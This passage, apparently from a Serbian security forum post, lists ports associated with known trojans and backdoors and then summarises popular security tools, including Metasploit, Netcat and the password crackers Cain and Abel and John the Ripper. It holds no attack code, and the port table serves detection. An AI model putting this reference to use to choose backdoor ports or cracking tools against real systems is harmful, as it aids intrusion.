port 1183 (UDP) - Cyn, SweetHeart
port 1200 (UDP) - NoBackO
port 1201 (UDP) - NoBackO
port 1207 SoftWAR
port 1208 Infector
port 1212 Kaos
port 1215 Force
port 1218 Force
port 1219 Force
port 1221 Fuck Lamers Backdoor
port 1222 Fuck Lamers Backdoor
port 1234 KiLo, Ultors Trojan
port 1243 BackDoor-G, SubSeven , Tiles
port 1245 VooDoo Doll
port 1255 Scarab
port 1256 Project nEXT, RexxRave
port 1272 The Matrix
port 1313 NETrojan
port 1314 Daodan
port 1349 BO dll
port 1369 SubSeven 2.2
port 1386 Dagger
port 1415 Last 2000, Singularity
port 1433 Voyager Alpha Force
port 1441 Remote Storm
port 1492 FTP99CMP
port 1524 Trinoo
port 1560 Big Gluck, Duddie
port 1561 (UDP) - MuSka52
port 1600 Direct Connection
port 1601 Direct Connection
port 1602 Direct Connection
port 1703 Exploiter
port 1711 yoyo
port 1772 NetControle
port 1772 (UDP) - NetControle
port 1777 Scarab
port 1826 Glacier
port 1833 TCC
port 1834 TCC
port 1835 TCC
port 1836 TCC
port 1837 TCC
port 1905 Delta Remote Access
port 1911 Arctic
port 1966 Fake FTP
port 1967 For Your Eyes Only , WM FTP Server
port 1978 (UDP) - Slapper
port 1981 Bowl, Shockrave
port 1983 Q-taz
port 1984 Intruzzo , Q-taz
port 1985 Black Diver, Q-taz
port 1985 (UDP) - Black Diver
port 1986 Akosch4
port 1991 PitFall
port 1999 Back Door, SubSeven , TransScout
port 2000 A-trojan, Der Späher / Der Spaeher, Fear, Force, GOTHIC Intruder , Last 2000, Real 2000, Remote Explorer 2000, Remote Explorer Y2K, Senna Spy Trojan Generator, Singularity
port 2000 (UDP) - GOTHIC Intruder , Real 2000, Remote Explorer 2000, Remote Explorer Y2K
port 2001 Der Späher / Der Spaeher, Duddie, Glacier, Protoss, Senna Spy Trojan Generator, Singularity, Trojan Cow
port 2001 (UDP) - Scalper
port 2002 Duddie, Senna Spy Trojan Generator, Sensive
port 2002 (UDP) - Slapper
port 2004 Duddie
port 2005 Duddie
port 2023 Ripper Pro
port 2060 Protoss
port 2080 WinHole
port 2101 SweetHeart
port 2115 Bugs
port 2130 (UDP) - Mini BackLash
port 2140 The Invasor
port 2140 (UDP) - Deep Throat , Foreplay , The Invasor
port 2149 Deep Throat
port 2150 R0xr4t
port 2156 Oracle
port 2222 SweetHeart, Way
port 2222 (UDP) - SweetHeart, Way
port 2281 Nautical
port 2283 Hvl RAT
port 2300 Storm
port 2311 Studio 54
port 2330 IRC Contact
port 2331 IRC Contact
port 2332 IRC Contact, Silent Spy
port 2333 IRC Contact
port 2334 IRC Contact, Power
port 2335 IRC Contact
port 2336 IRC Contact
port 2337 IRC Contact, The Hobbit Daemon
port 2338 IRC Contact
port 2339 IRC Contact, Voice Spy
port 2339 (UDP) - Voice Spy
port 2343 Asylum
port 2345 Doly Trojan
port 2407 yoyo
port 2418 Intruzzo
port 2555 li0n, T0rn Rootkit
port 2565 Striker trojan
port 2583 WinCrash
port 2589 Dagger
port 2600 Digital RootBeer
port 2702 Black Diver
port 2702 (UDP) - Black Diver
port 2772 SubSeven
port 2773 SubSeven , SubSeven 2.1 Gold
port 2774 SubSeven , SubSeven 2.1 Gold
port 2800 Theef
port 2929 Konik
port 2983 Breach
port 2989 (UDP) - Remote Administration Tool - RAT
port 3000 InetSpy, Remote Shut, Theef
port 3006 Clandestine
port 3024 WinCrash
port 3031 MicroSpy
port 3119 Delta Remote Access
port 3128 Reverse WWW Tunnel Backdoor , RingZero
port 3129 Masters Paradise
port 3131 SubSARI
port 3150 Deep Throat , The Invasor, The Invasor
port 3150 (UDP) - Deep Throat , Foreplay , Mini BackLash
port 3215 XHX
port 3215 (UDP) - XHX
port 3292 Xposure
port 3295 Xposure
port 3333 Daodan
port 3333 (UDP) - Daodan
port 3410 Optix Pro
port 3417 Xposure
port 3418 Xposure
port 3456 Fear, Force, Terror trojan
port 3459 Eclipse 2000, Sanctuary
port 3505 AutoSpY
port 3700 Portal of Doom
port 3721 Whirlpool
port 3723 Mantis
port 3777 PsychWard
port 3791 Total Solar Eclypse
port 3800 Total Solar Eclypse
port 3801 Total Solar Eclypse
port 3945 Delta Remote Access
port 3996 Remote Anything
port 3996 (UDP) - Remote Anything
port 3997 Remote Anything
port 3999 Remote Anything
port 4000 Remote Anything, SkyDance
port 4092 WinCrash
port 4128 RedShad
port 4128 (UDP) - RedShad
port 4156 (UDP) - Slapper
port 4201 War trojan
port 4210 Netkey
port 4211 Netkey
port 4225 Silent Spy
port 4242 Virtual Hacking Machine - VHM
port 4315 Power
port 4321 BoBo
port 4414 AL-Bareki
port 4442 Oracle
port 4444 CrackDown, Oracle, Prosiak, Swift Remote
port 4445 Oracle
port 4447 Oracle
port 4449 Oracle
port 4451 Oracle
port 4488 Event Horizon
port 4567 File Nail
port 4653 Cero
port 4666 Mneah
port 4700 Theef
port 4836 Power
port 5000 Back Door Setup, Bubbel, Ra1d, Sockets des Troie
port 5001 Back Door Setup, Sockets des Troie
port 5002 Shaft
port 5005 Aladino
port 5011 Peanut Brittle
port 5025 WM Remote KeyLogger
port 5031 Net Metropolitan
port 5032 Net Metropolitan
port 5050 R0xr4t
port 5135 Bmail
port 5150 Pizza
port 5151 Optix Lite
port 5152 Laphex
port 5155 Oracle
port 5221 NOSecure
port 5250 Pizza
port 5321 Firehotcker
port 5333 Backage
port 5350 Pizza
port 5377 Iani
port 5400 Back Construction, Blade Runner, Digital Spy
port 5401 Back Construction, Blade Runner, Digital Spy , Mneah
port 5402 Back Construction, Blade Runner, Digital Spy , Mneah
port 5418 DarkSky
port 5419 DarkSky
port 5419 (UDP) - DarkSky
port 5430 Net Advance
port 5450 Pizza
port 5503 Remote Shell
port 5534 The Flu
port 5550 Pizza
port 5555 Daodan, NoXcape
port 5555 (UDP) - Daodan
port 5556 BO Facil
port 5557 BO Facil
port 5569 Robo-Hack
port 5650 Pizza
port 5669 SpArTa
port 5679 Nautical
port 5695 Assasin
port 5696 Assasin
port 5697 Assasin
port 5742 WinCrash
port 5802 Y3K RAT
port 5873 SubSeven 2.2
port 5880 Y3K RAT
port 5882 Y3K RAT
port 5882 (UDP) - Y3K RAT
port 5888 Y3K RAT
port 5888 (UDP) - Y3K RAT
port 5889 Y3K RAT
port 5933 NOSecure
port 6000 Aladino, NetBus , The Thing
port 6006 Bad Blood
port 6267 DarkSky
port 6400 The Thing
port 6521 Oracle
port 6526 Glacier
port 6556 AutoSpY
port 6661 Weia-Meia
port 6666 AL-Bareki, KiLo, SpArTa
port 6666 (UDP) - KiLo
port 6667 Acropolis, BlackRat, Dark FTP, Dark IRC, DataSpy Network X, Gunsan, InCommand, Kaitex, KiLo, Laocoon, Net-Devil, Reverse Trojan, ScheduleAgent, SlackBot, SubSeven , Subseven 2.1.4 DefCon 8, Trinity, Y3K RAT, yoyo
port 6667 (UDP) - KiLo
port 6669 Host Control, Vampire, Voyager Alpha Force
port 6670 BackWeb Server, Deep Throat , Foreplay , WinNuke eXtreame
port 6697 Force
port 6711 BackDoor-G, Duddie, KiLo, Little Witch, Netkey, Spadeace, SubSARI, SubSeven , SweetHeart, UandMe, Way, VP Killer
port 6712 Funny trojan, KiLo, Spadeace, SubSeven
port 6713 KiLo, SubSeven
port 6714 KiLo
port 6715 KiLo
port 6718 KiLo
port 6723 Mstream
port 6766 KiLo
port 6766 (UDP) - KiLo
port 6767 KiLo, Pasana, UandMe
port 6767 (UDP) - KiLo, UandMe
port 6771 Deep Throat , Foreplay
port 6776 2000 Cracks, BackDoor-G, SubSeven , VP Killer
port 6838 (UDP) - Mstream
port 6891 Force
port 6912 Shit Heep
port 6969 2000 Cracks, BlitzNet, Dark IRC, GateCrasher, Kid Terror, Laphex, Net Controller, SpArTa, Vagr Nocker
port 6970 GateCrasher
port 7000 Aladino, Gunsan, Remote Grab, SubSeven , SubSeven 2.1 Gold, Theef
port 7001 Freak88, Freak2k
port 7007 Silent Spy
port 7020 Basic Hell
port 7030 Basic Hell
port 7119 Massaker
port 7215 SubSeven , SubSeven 2.1 Gold
port 7274 AutoSpY
port 7290 NOSecure
port 7291 NOSecure
port 7300 NetSpy
port 7301 NetSpy
port 7306 NetSpy
port 7307 NetSpy, Remote Process Monitor
port 7308 NetSpy, X Spy
port 7312 Yajing
port 7410 Phoenix II
port 7424 Host Control
port 7424 (UDP) - Host Control
port 7597 Qaz
port 7626 Glacier
port 7648 XHX
port 7673 Neoturk
port 7676 Neoturk
port 7677 Neoturk
port 7718 Glacier
port 7722 KiLo
port 7777 God Message
port 7788 Last 2000, Last 2000, Singularity
port 7788 (UDP) - Singularity
port 7789 Back Door Setup
port 7800 Paltalk
port 7826 Oblivion
port 7850 Paltalk
port 7878 Paltalk
port 7879 Paltalk
port 7979 Vagr Nocker
port 7983 (UDP) - Mstream
port 8011 Way
port 8012 Ptakks
port 8012 (UDP) - Ptakks
port 8080 Reverse WWW Tunnel Backdoor , RingZero, Screen Cutter
port 8090 Aphex's Remote Packet Sniffer
port 8090 (UDP) - Aphex's Remote Packet Sniffer
port 8097 Kryptonic Ghost Command Pro
port 8100 Back streets
port 8110 DLP
port 8111 DLP
port 8127 9_119, Chonker
port 8127 (UDP) - 9_119, Chonker
port 8130 9_119, Chonker, DLP
port 8131 DLP
port 8301 DLP
port 8302 DLP
port 8311 SweetHeart
port 8322 DLP
port 8329 DLP
port 8488 (UDP) - KiLo
port 8489 KiLo
port 8489 (UDP) - KiLo
port 8685 Unin68
port 8732 Kryptonic Ghost Command Pro
port 8734 AutoSpY
port 8787 Back Orifice 2000
port 8811 Fear
port 8812 FraggleRock Lite
port 8821 Alicia
port 8848 Whirlpool
port 8864 Whirlpool
port 8888 Dark IRC
port 9000 Netministrator
port 9090 Aphex's Remote Packet Sniffer
port 9117 Massaker
port 9148 Nautical
port 9301 DLP
port 9325 (UDP) - Mstream
port 9329 DLP
port 9400 InCommand
port 9401 InCommand
port 9536 Lula
port 9561 Crat Pro
port 9563 Crat Pro
port 9870 Remote Computer Control Center
port 9872 Portal of Doom
port 9873 Portal of Doom
port 9874 Portal of Doom
port 9875 Portal of Doom
port 9876 Rux
port 9877 Small Big Brother
port 9878 Small Big Brother, TransScout
port 9879 Small Big Brother
port 9919 Kryptonic Ghost Command Pro
port 9999 BlitzNet, Oracle, Spadeace
port 10000 Oracle, TCP Door, XHX
port 10000 (UDP) - XHX
port 10001 DTr, Lula
port 10002 Lula
port 10003 Lula
port 10008 li0n
port 10012 Amanda
port 10013 Amanda
port 10067 Portal of Doom
port 10067 (UDP) - Portal of Doom
port 10084 Syphillis
port 10084 (UDP) - Syphillis
port 10085 Syphillis
port 10086 Syphillis
port 10100 Control Total, GiFt trojan, Scalper
port 10100 (UDP) - Slapper
port 10167 Portal of Doom
port 10167 (UDP) - Portal of Doom
port 10498 (UDP) - Mstream
port 10520 Acid Shivers
port 10528 Host Control
port 10607 Coma
port 10666 (UDP) - Ambush
port 10887 BDDT
port 10889 BDDT
port 11000 DataRape, Senna Spy Trojan Generator
port 11011 Amanda
port 11050 Host Control
port 11051 Host Control
port 11111 Breach
port 11223 Progenic trojan, Secret Agent
port 11225 Cyn
port 11225 (UDP) - Cyn
port 11660 Back streets
port 11718 Kryptonic Ghost Command Pro
port 11831 DarkFace, DataRape, Latinus, Pest, Vagr Nocker
port 11977 Cool Remote Control
port 11978 Cool Remote Control
port 11980 Cool Remote Control
port 12000 Reverse Trojan
port 12310 PreCursor
port 12321 Protoss
port 12321 (UDP) - Protoss
port 12345 Ashley, BlueIce 2000, Mypic , NetBus , Pie Bill Gates, Q-taz , Sensive, Snape, Vagr Nocker, ValvNet , Whack Job
port 12345 (UDP) - BlueIce 2000
port 12346 NetBus
port 12348 BioNet
port 12349 BioNet, The Saint
port 12361 Whack-a-mole
port 12362 Whack-a-mole
port 12363 Whack-a-mole
port 12623 ButtMan
port 12623 (UDP) - ButtMan, DUN Control
port 12624 ButtMan, Power
port 12631 Whack Job
port 12684 Power
port 12754 Mstream
port 12904 Rocks
port 13000 Senna Spy Trojan Generator, Senna Spy Trojan Generator
port 13013 PsychWard
port 13014 PsychWard
port 13028 Back streets
port 13079 Kryptonic Ghost Command Pro
port 13370 SpArTa
port 13371 Optix Pro
port 13500 Theef
port 13753 Anal FTP
port 14194 CyberSpy
port 14285 Laocoon
port 14286 Laocoon
port 14287 Laocoon
port 14500 PC Invader
port 14501 PC Invader
port 14502 PC Invader
port 14503 PC Invader
port 15000 In Route to the Hell, R0xr4t
port 15092 Host Control
port 15104 Mstream
port 15206 KiLo
port 15207 KiLo
port 15210 (UDP) - UDP remote shell backdoor server
port 15382 SubZero
port 15432 Cyn
port 15485 KiLo
port 15486 KiLo
port 15486 (UDP) - KiLo
port 15500 In Route to the Hell
port 15512 Iani
port 15551 In Route to the Hell
port 15695 Kryptonic Ghost Command Pro
port 15845 (UDP) - KiLo
port 15852 Kryptonic Ghost Command Pro
port 16057 MoonPie
port 16484 MoSucker
port 16514 KiLo
port 16514 (UDP) - KiLo
port 16515 KiLo
port 16515 (UDP) - KiLo
port 16523 Back streets
port 16660 Stacheldraht
port 16712 KiLo
port 16761 Kryptonic Ghost Command Pro
port 16959 SubSeven , Subseven 2.1.4 DefCon 8
port 17166 Mosaic
port 17449 Kid Terror
port 17499 CrazzyNet
port 17500 CrazzyNet
port 17569 Infector
port 17593 AudioDoor
port 17777 Nephron
port 18753 (UDP) - Shaft
port 19191 BlueFire
port 19216 BackGate Kit
port 20000 Millenium, PSYcho Files, XHX
port 20001 Insect, Millenium, PSYcho Files
port 20002 AcidkoR, PSYcho Files
port 20005 MoSucker
port 20023 VP Killer
port 20034 NetBus 2.0 Pro, NetBus 2.0 Pro Hidden, Whack Job
port 20331 BLA trojan
port 20432 Shaft
port 20433 (UDP) - Shaft
port 21212 Sensive
port 21544 GirlFriend, Kid Terror
port 21554 Exploiter, FreddyK, Kid Terror, Schwindler, Sensive, Winsp00fer
port 21579 Breach
port 21957 Latinus
port 22115 Cyn
port 22222 Donald Dick, G.R.O.B., Prosiak, Ruler, RUX The TIc.K
port 22223 RUX The TIc.K
port 22456 Clandestine
port 22554 Schwindler
port 22783 Intruzzo
port 22784 Intruzzo
port 22785 Intruzzo
port 23000 Storm worm
port 23001 Storm worm
port 23005 NetTrash, Oxon
port 23006 NetTrash, Oxon
port 23023 Logged
port 23032 Amanda
port 23321 Konik
port 23432 Asylum
port 23456 Clandestine, Evil FTP, Vagr Nocker, Whack Job
port 23476 Donald Dick
port 23476 (UDP) - Donald Dick
port 23477 Donald Dick
port 23777 InetSpy
port 24000 Infector
port 24289 Latinus
port 25002 MOTD
port 25002 (UDP) - MOTD
port 25123 Goy'Z TroJan
port 25555 FreddyK
port 25685 MoonPie
port 25686 DarkFace, MoonPie
port 25799 FreddyK
port 25885 MOTD
port 25982 DarkFace, MoonPie
port 26274 (UDP) - Delta Source
port 26681 Voice Spy
port 27160 MoonPie
port 27184 Alvgus trojan 2000
port 27184 (UDP) - Alvgus trojan 2000
port 27373 Charge
port 27374 Bad Blood, Fake SubSeven, li0n, Ramen, Seeker, SubSeven , SubSeven 2.1 Gold, Subseven 2.1.4 DefCon 8, SubSeven 2.2, SubSeven Muie, The Saint
port 27379 Optix Lite
port 27444 (UDP) - Trinoo
port 27573 SubSeven
port 27665 Trinoo
port 28218 Oracle
port 28431 Hack´a´Tack
port 28678 Exploiter
port 29104 NETrojan, NetTrojan
port 29292 BackGate Kit
port 29559 AntiLamer BackDoor , DarkFace, DataRape, Ducktoy, Latinus, Pest, Vagr Nocker
port 29589 KiLo
port 29589 (UDP) - KiLo
port 29891 The Unexplained
port 29999 AntiLamer BackDoor
port 30000 DataRape, Infector
port 30001 Err0r32
port 30005 Litmus
port 30100 NetSphere
port 30101 NetSphere
port 30102 NetSphere
port 30103 NetSphere
port 30103 (UDP) - NetSphere
port 30133 NetSphere
port 30303 Sockets des Troie
port 30331 MuSka52
port 30464 Slapper
port 30700 Mantis
port 30947 Intruse
port 31320 Little Witch
port 31320 (UDP) - Little Witch
port 31335 Trinoo
port 31336 Butt Funnel
port 31337 ADM worm, Back Fire, Back Orifice (Lm), Back Orifice russian, BlitzNet, BO client, BO Facil, BO2, Freak88, Freak2k, NoBackO
port 31337 (UDP) - Back Orifice, Deep BO
port 31338 Back Orifice, Butt Funnel, NetSpy (DK)
port 31338 (UDP) - Deep BO, NetSpy (DK)
port 31339 Little Witch, NetSpy (DK), NetSpy (DK)
port 31339 (UDP) - Little Witch
port 31340 Little Witch
port 31340 (UDP) - Little Witch
port 31382 Lithium
port 31415 Lithium
port 31416 Lithium
port 31416 (UDP) - Lithium
port 31557 Xanadu
port 31745 BuschTrommel
port 31785 Hack´a´Tack
port 31787 Hack´a´Tack
port 31788 Hack´a´Tack
port 31789 Hack´a´Tack
port 31789 (UDP) - Hack´a´Tack
port 31790 Hack´a´Tack
port 31791 Hack´a´Tack
port 31791 (UDP) - Hack´a´Tack
port 31792 Hack´a´Tack
port 31887 BDDT
port 32000 BDDT
port 32001 Donald Dick
port 32100 Peanut Brittle, Project nEXT
port 32418 Acid Battery
port 32791 Acropolis, Rocks
port 33270 Trinity
port 33333 Prosiak
port 33545 G.R.O.B.
port 33567 li0n, T0rn Rootkit
port 33568 li0n, T0rn Rootkit
port 33577 Son of PsychWard
port 33777 Son of PsychWard
port 33911 Spirit 2000, Spirit 2001
port 34312 Delf
port 34313 Delf
port 34324 Big Gluck
port 34343 Osiris
port 34444 Donald Dick
port 34555 (UDP) - Trinoo (for Windows)
port 35000 Infector
port 35555 (UDP) - Trinoo (for Windows)
port 35600 SubSARI
port 36794 Bugbear
port 37237 Mantis
port 37651 Charge
port 38741 CyberSpy
port 38742 CyberSpy
port 40071 Ducktoy
port 40308 SubSARI
port 40412 The Spy
port 40421 Agent 40421, Masters Paradise
port 40422 Masters Paradise
port 40423 Masters Paradise
port 40425 Masters Paradise
port 40426 Masters Paradise
port 41337 Storm
port 41666 Remote Boot Tool , Remote Boot Tool
port 43720 (UDP) - KiLo
port 44014 Iani
port 44014 (UDP) - Iani
port 44444 Prosiak
port 44575 Exploiter
port 44767 School Bus
port 44767 (UDP) - School Bus
port 45092 BackGate Kit
port 45454 Osiris
port 45632 Little Witch
port 45673 Acropolis, Rocks
port 46666 Taskman
port 46666 (UDP) - Taskman
port 47017 T0rn Rootkit
port 47262 (UDP) - Delta Source
port 47698 KiLo
port 47785 KiLo
port 47785 (UDP) - KiLo
port 47891 AntiLamer BackDoor
port 48004 Fraggle Rock
port 48006 Fraggle Rock
port 48512 Arctic
port 49000 Fraggle Rock
port 49683 Fenster
port 49683 (UDP) - Fenster
port 49698 (UDP) - KiLo
port 50000 SubSARI
port 50021 Optix Pro
port 50130 Enterprise
port 50505 Sockets des Troie
port 50551 R0xr4t
port 50552 R0xr4t
port 50766 Schwindler
port 50829 KiLo
port 50829 (UDP) - KiLo
port 51234 Cyn
port 51966 Cafeini
port 52365 Way
port 52901 (UDP) - Omega
port 53001 Remote Windows Shutdown - RWS
port 54283 SubSeven , SubSeven 2.1 Gold
port 54320 Back Orifice 2000
port 54321 Back Orifice 2000, School Bus , yoyo
port 55165 File Manager trojan, File Manager trojan
port 55555 Shadow Phyre
port 55665 Latinus, Pinochet
port 55666 Latinus, Pinochet
port 56565 Osiris
port 57163 BlackRat
port 57341 NetRaider
port 57785 G.R.O.B.
port 58134 Charge
port 58339 Butt Funnel
port 59211 Ducktoy
port 60000 Deep Throat , Foreplay , Sockets des Troie
port 60001 Trinity
port 60008 li0n, T0rn Rootkit
port 60068 The Thing
port 60411 Connection
port 60551 R0xr4t
port 60552 R0xr4t
port 60666 Basic Hell
port 61115 Protoss
port 61337 Nota
port 61348 Bunker-Hill
port 61440 Orion
port 61603 Bunker-Hill
port 61746 KiLo
port 61746 (UDP) - KiLo
port 61747 KiLo
port 61747 (UDP) - KiLo
port 61748 (UDP) - KiLo
port 61979 Cool Remote Control
port 62011 Ducktoy
port 63485 Bunker-Hill
port 64101 Taskman
port 65000 Devil, Sockets des Troie, Stacheldraht
port 65289 yoyo
port 65421 Alicia
port 65422 Alicia
port 65432 The Traitor (= th3tr41t0r)
port 65432 (UDP) - The Traitor (= th3tr41t0r)
port 65530 Windows Mite
port 65535 RC1 trojan


I da, ovo je samo jedan mali broj trojanaca, tek nekih 3-4% svih postojecih....

1. Nessus (Premier UNIX vulnerability assessment tool)

Nessus is the best free network vulnerability scanner available, and the best to run on UNIX at any price. It is constantly updated, with more than 11,000 plugins for the free (but registration and EULA-acceptance required) feed. Key features include remote and local (authenticated) security checks, a client/server architecture with a GTK graphical interface, and an embedded scripting language for writing your own plugins or understanding the existing ones.Nessus 3 is now closed source, but is still free-of-cost unless you want the very newest plugins.






2. Wireshark (Sniffing the glue that holds the Internet together)

Wireshark (known as Ethereal until a trademark dispute in Summer 2006) is a fantastic open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, delving down into just the level of packet detail you need. Wireshark has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types. A tcpdump-like console version named tethereal is included. One word of caution is that Ethereal has suffered from dozens of remotely exploitable security holes, so stay up-to-date and be wary of running it on untrusted or hostile networks (such as security conferences).






3. Snort (A Everyone's favorite open source IDS {[b]intrusion detection systems}[/b])

This lightweight network intrusion detection and prevention system excels at traffic analysis and packet logging on IP networks. Through protocol analysis, content searching, and various pre-processors, Snort detects thousands of worms, vulnerability exploit attempts, port scans, and other suspicious behavior. Snort uses a flexible rule-based language to describe traffic that it should collect or pass, and a modular detection engine. Also check out the free Basic Analysis and Security Engine (BASE), a web interface for analyzing Snort alerts.
Open source Snort works fine for many individuals, small businesses, and departments. Parent company SourceFire offers a complimentary product line with more enterprise-level features and real-time rule updates. They offer a free (with registration) 5-day-delayed rules feed, and you can also find many great free rules at Bleeding Edge Snort.






4. Netcat (The network Swiss army knife)

This simple utility reads and writes data across TCP or UDP network connections. It is designed to be a reliable back-end tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections. The original Netcat was released by Hobbit in 1995, but it hasn't been maintained despite its immense popularity. It can sometimes even be hard to find nc110.tgz. The flexibility and usefulness of this tool have prompted people to write numerous other Netcat implementations - often with modern features not found in the original. One of the most interesting is Socat, which extends Netcat to support many other socket types, SSL encryption, SOCKS proxies, and more. It even made this list on its own merits. There is also Chris Gibson's Ncat, which offers even more features while remaining portable and compact.






5. Metasploit Framework (Hack the Planet)

Metasploit took the security world by storm when it was released in 2004. No other new tool even broke into the top 15 of this list, yet Metasploit comes in at #5, ahead of many well-loved tools that have been developed for more than a decade. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their online exploit building demo. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality. Similar professional exploitation tools, such as Core Impact and Canvas already existed for wealthy users on all sides of the ethical spectrum. Metasploit simply brought this capability to the masses.






6. Hping2 (A network probing utility like ping on steroids)

This handy little utility assembles and sends custom ICMP, UDP, or TCP packets and then displays any replies. It was inspired by the ping command, but offers far more control over the probes sent. It also has a handy traceroute mode and supports IP fragmentation. This tool is particularly useful when trying to traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities. This often allows you to map out firewall rulesets. It is also great for learning more about TCP/IP and experimenting with IP protocols.






7. Kismet (A powerful wireless sniffer)

Kismet is an console (ncurses) based 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing (as opposed to more active tools such as NetStumbler), and can even decloak hidden (non-beaconing) networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps. As you might expect, this tool is commonly used for wardriving. Oh, and also warwalking, warflying, and warskating, ...






8. Tcpdump (The classic sniffer for network monitoring and data acquisition)

Tcpdump is the IP sniffer we all used before Ethereal (Wireshark) came on the scene, and many of us continue to use it frequently. It may not have the bells and whistles (such as a pretty GUI or parsing logic for hundreds of application protocols) that Wireshark has, but it does the job well and with fewer security holes. It also requires fewer system resources. While it doesn't receive new features often, it is actively maintained to fix bugs and portability problems. It is great for tracking down network problems or monitoring activity. There is a separate Windows port named WinDump. TCPDump is the source of the Libpcap/WinPcap packet capture library, which is used by Nmap among many other tools.






9. Cain and Abel (The top password recovery tool for Windows)

UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. It is also well documented.






10. John the Ripper (A powerful, flexible, and fast multi-platform password hash cracker)

John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches. You will want to start with some wordlists, which you can find here, here, or here.



Izvor: Sectool




Programe mozete preuzeti klikom na slicice. Takodje je bitno napomenuti da ih preuzimate na sopstvenu odgovornost.

PuTTY konfiguracija

PuTTY je besplatan Win32 Telnet i SSH klijent. Softver sluzi prvenstveno za remote pristup drugim racunarima.









































Za detaljnije uputstvo ovde.


Program mozete preuzeti iz atacmenta.